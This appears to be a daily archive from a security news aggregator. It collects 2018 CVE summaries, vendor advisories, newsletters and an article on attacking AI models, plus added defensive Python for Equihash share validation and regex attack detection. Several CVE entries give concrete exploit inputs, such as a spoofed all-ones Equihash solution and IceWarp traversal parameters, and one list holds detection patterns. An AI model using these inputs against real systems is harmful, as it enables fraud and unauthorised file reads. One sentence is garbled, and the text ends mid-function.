Daily Archives: May 8, 2018

Google CTF 2018 is here

Google CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!

Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.

Hence, we are excited to announce Google CTF 2018:

  • Date and time: 00:00:01 UTC on June 23rd and 24th, 2018
  • Location: Online
  • Prizes: Big checks, swag and rewards for creative write-ups
The winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).

For beginners and veterans alike

Based on the feedback we received, we plan to have additional challenges this year where people that may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style where there will be a scenario similar to a real world penetration testing environment. We hope that this will give people a chance to sharpen their skills, learn something new about CTFs and security, while allowing them to see a real world value to information security and its broader impact.

We hope to virtually see you at the 3rd annual Google CTF on June 23rd 2018 at 00:00:01 UTC. Check g.co/ctf, or subscribe to our mailing list for more details, as they become available.

Why do we host these competitions?

We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.

Thirsty for more?

There are a lot of opportunities for you to help us make the Internet a safer place:

CVE-2018-10831 (z-nomp)

Z-NOMP before 2018-04-05 has an incorrect Equihash solution verifier that allows attackers to spoof mining shares, as demonstrated by providing a solution with {x1=1,x2=1,x3=1,...,x512=1} to bypass this verifier for any blockheader. This originally affected (for example) the Bitcoin Gold and Zcash cryptocurrencies, and continued to be exploited in the wild in May 2018 against smaller cryptocurrencies.
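A share verifier of the kind this CVE describes must reject a solution built from repeated indices before it ever recomputes hashes. The Python below is an added illustration, not the z-nomp project's code: it performs the structural checks on an Equihash solution's index list (length 2^k, index bit width, distinctness, and the per-subtree ordering that makes the solution canonical), so the all-ones share quoted in the description is rejected at the distinctness step. The parameters n=200, k=9 (512 indices of 21 bits), the function names and the sample inputs are assumptions. A complete Equihash check additionally recomputes the Blake2b hashes and confirms the XOR collisions, which this example omits.

```python
from typing import Sequence

# Constructed input: the spoofed share from the CVE text, 512 copies of index 1.
SPOOFED_SOLUTION = [1] * 512


def check_solution_structure(solution: Sequence[int], k: int = 9, index_bits: int = 21) -> str:
    """Run the structural Equihash checks on an index list.

    Returns "ok" when every check passes, otherwise a short reason string.
    Defaults assume Equihash(200, 9): 2**9 = 512 indices, each 21 bits wide.
    The hash/XOR-collision verification is deliberately not part of this function.
    """
    expected_len = 1 << k
    if len(solution) != expected_len:
        return f"wrong length: {len(solution)} indices, expected {expected_len}"

    # Every index must fit in the configured bit width.
    limit = 1 << index_bits
    for idx in solution:
        if not 0 <= idx < limit:
            return f"index {idx} out of range for {index_bits}-bit indices"

    # A solution is a set of leaves: any repeated index is invalid.
    # This is the check the all-ones share relies on being missing.
    if len(set(solution)) != len(solution):
        return "duplicate indices"

    # Canonical ordering: at every level of the binary tree, the first index
    # of the left subtree must be smaller than the first index of the right one.
    span = 2
    while span <= expected_len:
        half = span // 2
        for start in range(0, expected_len, span):
            if solution[start] >= solution[start + half]:
                return f"ordering violated at pair starting at position {start} (span {span})"
        span *= 2

    return "ok"


if __name__ == "__main__":
    # Constructed demo inputs: the spoofed share and a trivially ordered, distinct list.
    print("spoofed share:", check_solution_structure(SPOOFED_SOLUTION))
    print("distinct, ordered:", check_solution_structure(list(range(512))))
```

The ordering check mirrors the canonical-form rule that lets two verifiers agree on a single representation of a solution; a verifier that skips it accepts permutations of one valid solution as distinct shares, which is a separate but related way to inflate share counts.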

CVE-2018-10827 (litecart)

LiteCart before 2.1.2 allows remote attackers to cause a denial of service (memory consumption) via URIs that do not exist, because public_html/logs/not_found.log grows without bound, and is loaded into memory for each request.

CVE-2018-10705 (aura)

The Owned smart contract implementation for Aurora DAO (AURA), an Ethereum ERC20 token, allows attackers to acquire contract ownership because the setOwner function is declared as public. An attacker can then conduct a lockBalances() denial of service attack.

Why Organizations Need to Secure Their Containers

Containers are revolutionizing the way that organizations deploy applications. These technologies are packages, notes Amazon Web Services (AWS), that enable teams to run applications and their code, configurations and dependencies in resource-isolated processes. As such, they allow for reduced environmental dependencies, support for micro-services and horizontal scalability, among other advantages. Containers help solve some of […]

The post Why Organizations Need to Secure Their Containers appeared first on The State of Security.

SN 662: Spectre – NextGen

This week we begin by updating the status of several ongoing security stories: Russia vs Telegram, DrupalGeddon2, and the return of RowHammer. We will conclude with MAJOR new bad news related to Spectre. We also have a new cryptomalware, Twitter's in-the-clear passwords mistake, new Android 'P' security features, a crazy service for GDPR compliance, Firefox's sponsored content plan, another million routers being attacked, more deliberately compromised JavaScript found in the wild, a new Microsoft Meltdown mistake, a comprehensive Windows command reference, and signs of future encrypted Twitter DMs.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6.

Bandwidth for Security Now is provided by CacheFly.


NBlog May 9 – security essentials

There's more than a grain of truth in the saying that complexity is the enemy of security. 

Complex systems, processes and situations are harder to analyze and control. There are more things to go wrong, more interactions, more states to consider, more factors to bear in mind. Complex things are generally more fragile, less resilient, more likely to fail or be broken. 

The same applies to security awareness and training. People can only take in so much new stuff at a time.

I've blogged before about today's information overload, people constantly working on interrupt with a million distractions. If we make our awareness stuff too hard, requiring too much time and attention from the audiences, they won't bother so we're not going to achieve much.

Two complementary awareness and training approaches to address this issue are:

  1. Break the awareness and training content into discrete chunks - bite-sized pieces from which to construct the whole jigsaw; and
  2. Simplify each chunk as far as possible. Make the pieces tastier, more digestible.

So, what does that mean for our next topic? We have already decided on the chunk, and as I said yesterday, we're well on the way towards defining the scope. At the same time however we're complicating matters by stitching together incident management and business continuity management, so we need to work on simplifying the content.

An approach that usually works well for me is to visualize the topic area in the form of a mind-map with a central blob for the title and satellite blobs for each of the main aspects, breaking those down further as appropriate and making links between related parts. Sometimes it takes a couple of iterations to get down to the nitty-gritty, just the key aspects in a logical sequence that makes sense, but that's pretty easy with a graphics program or indeed on paper with pencil and eraser.

Perhaps this month I'll try condensing the topic down to its essentials on a Post-It Note-sized mind map, hopefully without having to resort to a super-fine pencil and magnifying glass. Wish me luck!

Debug Exception May Cause Unexpected Behavior

Original release date: May 08, 2018

CERT Coordination Center (CERT/CC) has released information for CVE-2018-8897 – unexpected behavior for debug exceptions. A local attacker could exploit this bug to obtain sensitive information.

NCCIC encourages users and administrators to review CERT/CC’s Vulnerability Note VU #631579 for more information and refer to operating system or software vendors for appropriate patches.


SynAck Ransomware Adopts Doppelganging Technique To Evade Detection

Security researchers have spotted a new and improved version of the SynAck ransomware that uses the Process Doppelgänging technique, which makes the malware hard to find and stop.

The Process Doppelgänging technique abuses a built-in Windows feature, NTFS transactions, together with an outdated implementation of the Windows process loader to launch a malicious process: adversaries replace the memory of a legitimate process with malicious code. Because the result looks like a legitimate process running, the technique evades process monitoring tools and anti-virus software.

“The main purpose of the technique is to use NTFS transactions to launch a malicious process from the transacted file so that the malicious process looks like a legitimate one,” wrote Anton Ivanov, Fedor Sinitsyn and Orkhan Mamedov, security researchers with Kaspersky Lab.

SynAck ransomware first surfaced in Sept. 2017, when it was used by cybercriminals to target open or badly-secured RDP connections. Since then, SynAck has matured and become more powerful and dangerous.

“First, [SynAck] checks if it’s installed in the right directory. If it’s not, it doesn’t run,” researchers noted. “Second, SynAck checks if it’s installed on a computer with a keyboard set to a certain script — in this case, Cyrillic — in which case it also does nothing.”

The latest targets of the observed attacks were the U.S., Kuwait, Germany, and Iran. Ransom demands can be as high as $3,000.

“The ability of the Process Doppelgänging technique to sneak malware past the latest security measures represents a significant threat; one that has, not surprisingly, quickly been seized upon by attackers,” Ivanov said, in a statement. “Our research shows how the relatively low-profile, targeted ransomware SynAck used the technique to upgrade its stealth and infection capability.”

Firewall Management Maturity Stage 2: Next Generation Firewall Management

In the second of this three-part series examining the stages of firewall management maturity, we look at next generation firewall technology. Next generation firewalls provide tremendous value, but also present unique challenges for organizations trying to manage the technology.

Risky Business #498 — There sure is a lot of Microsoft Defender out there these days

On this week’s show we’re taking a look at some recent data out of Microsoft trumpeting its Defender antivirus install figures on Windows. They’ve got 18% market share on Windows 7/9 and 50% on Win10.

For the AV and endpoint security industry Microsoft has always been the existential threat, but has the plane flown into the mountain already? We’ll speak with Securosis analyst and DisruptOps founder Rich Mogull about that in this week’s feature interview.

In this week’s sponsor interview we’re joined by the always entertaining Haroon Meer of Thinkst Canary. When we spoke Haroon had just wrapped up his first ever booth at the RSA conference. He’ll join us this week to tell us, surprisingly, that it was a really worthwhile exercise for Thinkst, but as you’ll hear he also thinks the broader industry can be a pack of dumbasses when it comes to actually marketing tech at events like RSA. If he becomes global ruler RSA booths will be gimmick-free and just show people product demos.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

BREAKING: Documents show how provincial employees misled Halifax police in the FOIPOP security failure
FTC urges Twitter users to change passwords | TheHill
Iran nuclear deal: Trump pulls US out in break with Europe allies - BBC News
Patrick Gray on Twitter: "There are teams workshopping ideas like this in Tehran right now, guaranteed. Personally I'm more worried about Iranian ICS hax. They've gotten good at that stuff.… https://t.co/XQBvRcUKw9"
Caroline O. on Twitter: "NEW: The Senate Intelligence Committee released its prelim findings into Russian targeting of election infrastructure during the 2016 election. "In a small # of states, Russian-affiliated cyber actors were in a position to, at a minimum, alter or delete voter registration data."… https://t.co/Y0GMwUZEFU"
Facebook security analyst is fired for using private data to stalk women | Ars Technica
Sources: Facebook Has Fired Multiple Employees for Snooping on Users - Motherboard
Drive-by Rowhammer attack uses GPU to compromise an Android phone | Ars Technica
Android App With 10 Million Downloads Left Users’ Photos and Audio Messages Exposed to Public - Motherboard
Hundreds of big-name sites hacked, converted into drive-by currency miners | Ars Technica
Report: Chinese government is behind a decade of hacks on software companies | Ars Technica
Over 10,000 companies downloading software vulnerable to Equifax hack
European Central Bank proposes framework to strengthen financial system’s defenses
Hysteria over Jade Helm exercise in Texas was fueled by Russians, former CIA director says | The Texas Tribune
Defector: WikiLeaks ‘Will Lie to Your Face’
SiliVaccine: Inside North Korea’s Anti-Virus - Check Point Research
You Can Finally Encrypt Slack Messages So Your Boss Can't Read Them - Motherboard
Microsoft May 2018 Patch Tuesday Fixes 67 Security Issues, Including IE Zero-Day
Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
He Fled a Prison in Iceland. Now It’s Good to Be Back. - The New York Times
Report: Software bug led to death in Uber’s self-driving crash | Ars Technica
Carbon Black stocks close 26 percent up on first day of public trading
Why Windows Defender Antivirus is the most deployed in the enterprise – Microsoft Secure
thinkst Thoughts...: Considering an RSAC Expo booth? Our Experience, in 5,000 words or less

Ubuntu Security Notice USN-3641-2

Ubuntu Security Notice 3641-2 - USN-3641-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 17.10. This update provides the corresponding updates for Ubuntu 12.04 ESM. Nick Peterson discovered that the Linux kernel did not properly handle debug exceptions following a MOV/POP to SS instruction. A local attacker could use this to cause a denial of service. This issue only affected the amd64 architecture. Various other issues were also addressed.

Georgia Governor Vetoes Cybersecurity Bill S.B. 315

Tripwire had serious concerns with a cybersecurity bill that was passed by the Georgia legislature in early April. It was Tripwire’s concern that the bill would actually increase cybersecurity risks by criminalizing responsible non-malicious security research. As a result, Tripwire sent a letter to Georgia Governor Nathan Deal asking him to veto the bill. As […]

The post Georgia Governor Vetoes Cybersecurity Bill S.B. 315 appeared first on The State of Security.

Cisco WebEx Recording Format Player Information Disclosure Vulnerability

A vulnerability in Cisco WebEx Recording Format (WRF) Player could allow an unauthenticated, remote attacker to access sensitive data about the application. An attacker could exploit this vulnerability to gain information to conduct additional reconnaissance attacks.

The vulnerability is due to a design flaw in Cisco WRF Player. An attacker could exploit this vulnerability by utilizing a maliciously crafted file that could bypass checks in the code and enable an attacker to read memory from outside the bounds of the mapped file.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
Security Impact Rating: Medium
CVE: CVE-2018-0288

Social-Engineer Newsletter Vol 08 – Issue 104

Vol 08 Issue 104
May 2018

In This Issue

  • Two-Factor or Not Two-Factor? Why is This a Question?
  • Social-Engineer News
  • Upcoming classes

As a member of the newsletter you have the option to OPT-IN for special offers. You can click here to do that.

Do you like FREE Stuff?

How about the first chapter of ALL OF Chris Hadnagy’s Best Selling Books

If you do, you can register to get the first chapter completely free: just go over to http://www.social-engineer.com to download now!

To contribute your ideas or writing send an email to contribute@social-engineer.org

If you want to listen to our past podcasts hit up our Podcasts Page and download the latest episodes.

Our good friends at CSI Tech just put their RAM ANALYSIS COURSE ONLINE – FINALLY.

The course is designed for Hi-Tech Crime Units and other digital investigators who want to leverage RAM to acquire evidence or intelligence which may be difficult or even impossible to acquire from disk. The course does not focus on the complex structures and technology behind how RAM works but rather on how an investigator can extract what they need for an investigation quickly and simply.

Interested in this course? Enter the code SEORG and get an amazing 15% off!

You can also pre-order CSI Tech CEO Nick Furneaux’s new book, Investigating Cryptocurrencies: Understanding, Extracting, and Analyzing Blockchain Evidence, now!

A Special Thanks to:

The EFF for supporting freedom of speech


Two-Factor or Not Two-Factor? Why is This a Question?

Two-factor authentication, or “2FA” as the cool kids call it, is a common form of multi-factor authentication, or MFA. These are not new concepts. In fact, they have been around in one form or another as part of human culture for likely as long as humans have been talking to each other. Examples include asking additional questions, or requiring additional actions, to properly determine whether you are who you say you are, and having someone vouch for you or sponsor your entry into some activity.

Technology companies have been slowly introducing these methods to combat online identity theft for many years. Not all forms of MFA are equal in any sense: NIST has suggested that SMS-based 2FA is not sufficient to thwart sophisticated attacks, as opposed to security tokens (think Google Authenticator or Duo Mobile) and physical keys.

The Link Between SE and 2FA

How does this relate to social engineering, you ask? Well, social engineering can be used to both learn the additional authentication factors you may or may not use, and the details needed to bypass them if they are in place. While SMS is not recommended as an MFA option by NIST, stronger implementations of MFA can be a decent form of defense against otherwise successful social engineering attacks.

Where would a social engineer get details about your methods of authentication? Well, one possibility is Facebook. The collection of personal information, as described in the Cambridge Analytica stories in the news, was performed via Facebook surveys. Before that was trending, the same mechanism had been used by attackers to learn respondents’ answers to popular security questions. Once an attacker has a bit of your personal information they may be able to leverage it to gain access to your other accounts. This further emphasizes the need for MFA on all accounts, since your security questions may not be as secure as you think.

Human-Based MFA

As a defensive mechanism, friends have told me about working mothers who rely on friends to pick up their kids from school or after-school activities using human-based MFA. These moms establish a code word that only they, their kids, and the proxy know, so when someone approaches the children without knowing the code word, the children know not to trust the person. I use a similar technique when I send links to people I regularly communicate with, by adding in special key words we have discussed in person to verify that the link I am sending is actually from me. If those words are not in the message, I am not the one sending it. It is a very effective form of MFA and simple once all parties understand the purpose.

As a security professional, I try to convey security best practices to my family and friends, but I cannot force the methods on anyone who is not willing to listen. Now, I don’t send a lot of messages to family members online, as I don’t participate in a lot of social media and any that I do is not connected to family members. So, when I announced my participation in a charity to my family via a group SMS chat, I didn’t think twice about the message I was sending until after I sent it. It was basically written as “Hey I’m doing this thing, I wanted you to know. Check out this link.” Right after I sent it I thought to myself, “well, that looks phishy, am I really expecting my family to just follow this link?” As I was typing out a second message explaining the weird post, to my surprise and delight, one of my siblings reached out to me outside the chat and asked if I had just sent them a link. I was pretty happy that a couple of seconds of effort seemed worth it to my family, just to be sure it was ok to follow the link. That is human-based MFA at work.

MFA Really Works

Professionally, it is clear that some forms of MFA are effective against social engineering attacks that result in credential theft. This point is illustrated when comparing two recent engagements SECOM performed.

In both cases, phishing emails were sent to targeted users and, in both cases, one or more users clicked the phishing link, filled out the login form, and disclosed valid network credentials. What happened next clearly shows the value of MFA. In one case we successfully accessed email and online shared storage accounts, and sent additional phish from compromised user accounts to gain even more credentials and access to sensitive information. In the other case, we were prompted to insert “our” YubiKey to verify who we were. We didn’t have the necessary key, so no additional access was gained. Without MFA enabled we fully compromised the target; with MFA enabled we were left with credentials we could do nothing with in that moment. Back to the drawing board for us, big props to that client.

The people I talk to about enabling MFA who are not in the computer industry seem intimidated by the process of enabling and using it, but once they are set up it fits in with normal online activity pretty quickly. If you are curious whether the services you use have MFA options, you can typically find the setup in your account settings, usually under the security or login sections. Also, you can check this site to see which services have MFA options, and which don’t, so you can choose your services based on your desired security preferences. Once most people are accustomed to, and regularly use, MFA for all their accounts, it is much harder for a social engineer to gain access to resources via credential theft. This means attackers will have to work much harder than they need to now to access accounts.

Written By: Ryan MacDougall


As part of the newsletter group, you will be the first to receive special offers to services and products by Social-Engineer.Com.


The post Social-Engineer Newsletter Vol 08 – Issue 104 appeared first on Security Through Education.

Fighting SOC Alert Overload With Effective Threat Intelligence

Key Takeaways

  • Threat intelligence isn’t just a silo in security and has advantages to bring to many different roles in your organization.
  • Teams triaging alerts in security operations centers (SOCs) are overwhelmed with event data that has no context.
  • Threat intelligence packaged correctly for the SOC analyst can make them 10 times more productive.

The concept of threat intelligence and its potential usefulness to any business that’s serious about cybersecurity is not difficult to grasp. The more you know about potential attacks, how you might be attacked, and what those attacks will target, the better equipped you are to defend and align your resources effectively.

The difficulty seems to arise in deciding how to actually implement threat intelligence. Many cybersecurity professionals appear to be laboring under the misapprehension that intelligence can only be produced or used by an elite team of analysts dedicated to producing packaged intelligence for those at the very top of the security organization. This really couldn’t be further from the truth. Threat intelligence is not simply a siloed team or technology, but can be used by many teams, job functions, or roles in security as long as it’s delivered in the right way.

Chris Crowley is a principal instructor for the SANS Institute and specializes in training how to effectively manage security operations. He highlights how threat intelligence needs to join up across all of security:

When we’re doing threat intelligence, we have specific artifacts or outputs that we would produce: indicators of compromise, TTPs, campaign reporting, strategic threat modeling, and finally, one of the artifacts in threat intelligence should be actions that our organization is taking in order to defend its assets. This isn’t just lofting a report over the partition wall — this is making sure that we do things.

Applying Threat Intelligence to Monitoring and Triaging Alerts

One key role right at the start of the security operations center process is monitoring security alerts from SIEM, IDS, EDR, and other technologies to identify and respond to security events and incidents.

Cisco’s 2018 Security Capabilities Benchmark Study found that organizations can investigate only 56 percent of the security alerts they receive on a given day, and of the investigated alerts, 34 percent are deemed legitimate. We can reasonably assume that the volume of alerts into security operations teams contributes significantly to the number of alerts being investigated.

[Figure: Cisco 2018 Security Capabilities Benchmark Study graphic]

The faster analysts can triage and make their initial investigations into alerts, the more alerts the SOC will be able to process. Applying the right kinds of intelligence aims to eliminate these challenges, helping organizations proactively defend against cyberattacks. A few of the challenges that can be overcome include:

1. Alert fatigue.

Alert fatigue is caused by a large number of frequent alarms that leads to analysts taking them less seriously — the boy who cried wolf, essentially. Threat intelligence applied correctly should enable a level of automation to empower faster research and a more intimate understanding of the various alerts. Ideally, an environment with fewer but better alerts is created to improve the effectiveness with which the security team can provide threat analysis.

2. High volumes of alerts and only internal information.

Often, SOCs encounter the problem of too much information with relatively little to no context. Usually, this information comes from simply looking at the telemetry of network devices and log files, setting up rules to examine anomalous behavior, and other rule sets that deliver a high quantity of raw data. Threat intelligence should be situation-specific advice to more effectively provide context to the data and subsequently implement a strategic response. To enable even faster triage, this intelligence should make its own reasonable assumption about what kind of risk a particular indicator presents. Recorded Future does this by providing a real-time risk score.

3. There’s a lot of external data but it’s hard to find intelligence.

It can be incredibly time consuming for an analyst using manual methods (googling, security news sites, favorited blogs, etc.) to find useful external information. Threat intelligence solutions should help analysts by giving not just fast access to intelligence from this range of sources, but also consolidate that intelligence into a single readable view. The more consumable this intelligence is, the more useful it becomes to teams under significant time constraints.

Recorded Future has previously tested the power of threat intelligence in speeding up SOC analyst efficiency. Our independent test shows that applying real-time threat intelligence powered by machine learning cuts analyst time to triage a security event from a firewall log from three minutes to 1.2 seconds on average, resulting in a 10 times gain in productivity.

And it’s not just SOC analysts that have something to gain. Take a look at our new white paper, “Busting Threat Intelligence Myths: A Guide for Security Professionals” to get an understanding of the difference threat intelligence can make in every role of security.

The post Fighting SOC Alert Overload With Effective Threat Intelligence appeared first on Recorded Future.


Wipers – Destruction as a means to an end

This whitepaper was authored by Vitor Ventura, with contributions from Martin Lee.

In a digital era when everything and everyone is connected, malicious actors have the perfect space to perform their activities. During the past few years, organizations have suffered several kinds of attacks that arrived in many shapes and forms. But none have been more impactful than wiper attacks. Attackers who deploy wiper malware have a singular purpose of destroying or disrupting systems and/or data.

Unlike malware that holds data for ransom (ransomware), when a malicious actor decides to use a wiper in their activities, there is no direct financial motivation. For businesses, this often is the worst kind of attack, since there is no expectation of data recovery.

Another crucial aspect of a wiper attack is the fear, uncertainty and doubt that it generates. In the past, wiper attacks have been used by malicious actors with a dual purpose: generating social destabilization while sending a public message, and at the same time destroying all traces of their activities.

A wiper's destructive capability can vary, ranging from the overwriting of specific files to the destruction of the entire filesystem. The amount of data impacted will be a direct consequence of the technique used, which, of course, has a direct impact on the business — the harder the data/system recovery process becomes, the bigger the business impact.

The defense against these attacks often falls back to the basics. By having certain protections in place — a tested cyber security incident response plan, a risk-based patch management program, a tested and cyber security-aware business continuity plan, and network and user segmentation on top of the regular software security stack — an organization dramatically increases its resilience against these kinds of attacks.

Download the full whitepaper here.

CVE-2017-2606 (jenkins)

Jenkins before versions 2.44, 2.32.2 is vulnerable to an information exposure in the internal API that allows access to item names that should not be visible (SECURITY-380). This only affects anonymous users (other users legitimately have access) that were able to get a list of items via an UnprotectedRootAction.

CVE-2015-1503 (mail_server)

Multiple directory traversal vulnerabilities in IceWarp Mail Server before 11.2 allow remote attackers to read arbitrary files via a (1) .. (dot dot) in the file parameter to a webmail/client/skins/default/css/css.php page or .../. (dot dot dot slash dot) in the (2) script or (3) style parameter to webmail/old/calendar/minimizer/index.php.

Georgia governor vetoes bill that would criminalize good-faith security research, permit vigilante action

The governor of Georgia, Nathan Deal, has vetoed SB 315, the controversial bill that would have criminalized many forms of routine security research, and legalized vigilante action by victims of cybercrime (so-called "hack back").

In a statement, the governor wrote, "while intending to protect against online breaches and hacks, SB 315 may inadvertently hinder the ability of government and private industries to do so."

The veto sends the bill back to the Georgia legislature, which may try to override Deal's veto. "It is my hope that legislators will work with the cyber security and law enforcement communities moving forward to develop a comprehensive policy that promotes national security, protects online information, and continues to advance Georgia’s position as a leader in the technology industry," the governor added.


Goldman Sells In-House Cybersecurity Software to Tech Company

Product combines threat intelligence and investigation

Bloomberg, By Yalman Onaran, May 7, 2018

Goldman Sachs Group Inc. is selling cybersecurity software it developed to a company that specializes in that market in exchange for an equity stake.

LookingGlass Cyber Solutions will buy the Sentinel platform from Goldman Sachs, according to executives at both companies. The software combines intelligence — gathering data on potential threats — with investigation of possible breaches, a combination that makes it attractive to other financial institutions, the executives said, declining to provide more details on the terms of the transaction.

Security systems like Sentinel require constant upgrading and maintenance, jobs more suited to a technology company than an investment bank, Andy Ozment, chief information security officer at Goldman Sachs, said in an interview. LookingGlass is better positioned to develop it for other companies to use, he said.

“We’ve had interest from other financial institutions for Sentinel,” Ozment said. “But it’s one thing to write software to use yourself and quite another thing to write something that anybody can take and install on their systems.”

LookingGlass has close to 300 clients worldwide, with banks and government agencies making up the bulk.

Sentinel is a “phenomenal piece of software” that will be appealing to clients even outside financial services, Chief Executive Officer Chris Coleman said in an interview.

Goldman has a history of selling off technology originally developed for internal use. In 2013, it sold a majority stake in its electronic-trading platform, Redi, to other Wall Street firms to open it up to more brokers and their clients. It sold software that lets employees access sensitive information on mobile devices to Synchronoss Technologies Inc. in 2015.

Source: https://www.bloomberg.com/news/articles/2018-05-07/goldman-sells-in-house-cybersecurity-software-to-tech-company


VERT Threat Alert: May 2018 Patch Tuesday Analysis

Today’s VERT Alert addresses Microsoft’s May 2018 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-777 on Wednesday, May 9th.

In-The-Wild & Disclosed CVEs

CVE-2018-8120

This privilege escalation vulnerability affecting Win32k could allow an attacker to execute code in kernel mode. According to Microsoft, the newest OS releases […]


CVE-2018-6921 (freebsd)

In FreeBSD before 11.1-STABLE(r332066) and 11.1-RELEASE-p10, due to insufficient initialization of memory copied to userland in the network subsystem, small amounts of kernel memory may be disclosed to userland processes. Unprivileged authenticated local users may be able to access small amounts of privileged kernel data.

CVE-2018-6920 (freebsd)

In FreeBSD before 11.1-STABLE(r332303), 11.1-RELEASE-p10, 10.4-STABLE(r332321), and 10.4-RELEASE-p9, due to insufficient initialization of memory copied to userland in the Linux subsystem and Atheros wireless driver, small amounts of kernel memory may be disclosed to userland processes. Unprivileged authenticated local users may be able to access small amounts of privileged kernel data.

CVE-2018-10812 (bitcoin_wallet)

The Bitpie application through 3.2.4 for Android and iOS uses cleartext storage for digital currency initial keys, which allows local users to steal currency by leveraging root access to read /com.biepie/shared_prefs/com.bitpie_preferences.xml (on Android) or a plist file in the app data folder (on iOS).

The AI’ker’s Guide to the (cybersecurity) Galaxy

As a security veteran, I find myself from time to time having to explain to newbies the importance of adopting a hacker’s way of thinking, and the difference between a hacker’s and a builder’s way of thinking.

If you can’t think like an attacker, how are you going to build solutions to defend against them? For the last 4 years I have been involved in several research projects (most successful, some not so much) aimed at incorporating AI technology into Imperva products. The most significant challenge we had to cope with was making sure that our use of AI worked safely in adversarial settings: assuming that adversaries are out there, investing their brain power in understanding our solutions and adapting to them, polluting training data and trying to sneak through security mechanisms.

In recent years we’ve seen a surge in Artificial Intelligence technology being incorporated into almost every aspect of our lives. Having made remarkable leaps forward in areas like visual object recognition, semantic segmentation, and speech recognition, it’s only natural to see other industries race to adopt AI as their solution to, well… everything really.

The Security Lifecycle

Unsurprisingly, most vendors using AI don’t think of security. I remember one of the most interesting DefCon sessions I’ve seen: research on the security of smart traffic sensors. Researcher Cesar Cerrudo saw a scene in a movie where hackers cleared a route of green lights through traffic and wondered whether this was possible. The answer was, of course, yes. In probing this ecosystem for security mechanisms to circumvent, Cerrudo wasn’t able to find any. What he did find, however, was a disturbingly easy way to take control of the sensors buried in the roads and to disable them.

I remember this session not because of the sophisticated hacking techniques used, but because it reminded me of a meeting with a large car manufacturer I had a few years earlier. As they started venturing further into the digitization of automotive systems – moving from purely mechanical systems into a wired/wireless network of digital devices, connected to external entities like garages and service centers – they discovered severe vulnerabilities and new cyber threats to the industry, with potentially lethal results.

This is the unfortunate, but inevitable, security lifecycle of new technologies – closely tied to the Gartner hype cycle. In its early days, the community talks innovation and opportunity; expectations and excitement couldn’t be higher. Then comes disillusionment. Once security researchers find ways to make the system do things it wasn’t supposed to, and in particular if the trickle of vulnerabilities turns into a flood, the excitement is replaced with FUD – fear, uncertainty and doubt about the risk associated with the new technology.

Just like automotive systems and smart cities, there are no security exceptions when it comes to AI.

When it comes to security, AI is no different from other technologies. When a system is designed without considering what attackers look for, it’s likely that an attacker will find ways to make that system do things it’s not supposed to. Some of you might be familiar with Google research from 2015, where they added human-invisible noise to an image of a school bus and had the AI classify it as an ostrich; more recently, research in the same field produced some pretty interesting new applications based on the 2015 exercise.

The Houdini framework was able to fool pose estimation, speech recognition and semantic segmentation AI. Facial recognition, used in many control and surveillance systems – like those used in airports – was completely confused by colorful glasses with deliberately embedded patterns meant to puzzle the system. Next-gen anti-virus software using AI for malware detection was circumvented by another AI in a super-cool bot-vs.-bot research project presented at Black Hat last year. Several bodies of research show that in many cases AI deception has transferability: deceptive samples crafted for model A are found to be effective against another model A’ that solves the same problem.

It’s not all doom and gloom

That was the bad news; the good news is that AI can be used safely. Our product portfolio uses AI technology extensively to improve protection against a variety of threats to web applications and data systems. We do this effectively and, perhaps most important, safely. Based on our experience, I’ve gathered some guidelines for the safe usage of AI.

While these are not binary rules, we find these guidelines effective in estimating the risk that adversarial behavior poses to a system that uses AI.

  1. Opt for robust models – with non-robust AI models, small, insignificant differences in the input may have a significant impact on the model’s decision. Using non-robust models allows attackers to generate same-essence, different-look input, which is essential to most attacks.
  2. Choose explainable models – in many cases AI This situation is optimal from the attacker’s perspective. The deception is expressed only in the decision, reducing the chances of someone noticing that something doesn’t look right with the decision.
  3. Training data sanitization – data used for training the model must be sanitized, assuming that an attacker may have control over part of it. Sanitization in most cases means filtering out suspicious data.
  4. Internal use – Input: consider reducing the attacker’s influence on the data entering the AI.
  5. Internal use – Output: opt for AI in functions where the output is not exposed to attackers, reducing the attacker’s ability to learn whether a deception attempt was successful.
  6. Threat Detection – opt for positive security: when using AI for threat detection, choose a positive security model. Negative security models exonerate everything except what was identified as a known attack, usually based on specific attack patterns. This model is susceptible to deception if the attacker is able to modify how the input looks without changing its essence. Positive security models are by nature more robust, giving the attacker much less slack and reducing the chances of finding a same-essence, different-look input that goes undetected.
  7. Threat Detection – combine with other mechanisms: when using AI in a negative security model, use it as another detection layer, aimed at detecting threats that pass other “less intelligent” security mechanisms, and not as the sole measure.
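To make guidelines 6 and 7 concrete, here is an added example (not code from the original post or from Imperva) contrasting a negative security detector, which only flags inputs that match known-bad patterns, with a positive security validator that accepts only the shape a field is supposed to have, and a layered verdict in which a hypothetical AI score is one signal on top of the positive check rather than the sole decision. The field, the patterns, the samples and the score threshold are all constructed for illustration.

```python
import re

# Negative security: exonerate everything except what matches a known attack
# pattern. Each pattern knows exactly one "look" of its attack.
KNOWN_BAD = [
    re.compile(r"\.\./"),          # one spelling of a directory-traversal token
    re.compile(r"<script", re.I),  # one spelling of a script-injection token
]


def negative_model_flags(value: str) -> bool:
    """True when the input matches a known-bad pattern; everything else passes."""
    return any(p.search(value) for p in KNOWN_BAD)


# Positive security: accept only what this (hypothetical) identifier field is
# supposed to contain. Anything else is rejected without naming an attack.
EXPECTED_SHAPE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def positive_model_accepts(value: str) -> bool:
    """True only when the input has exactly the shape the field expects."""
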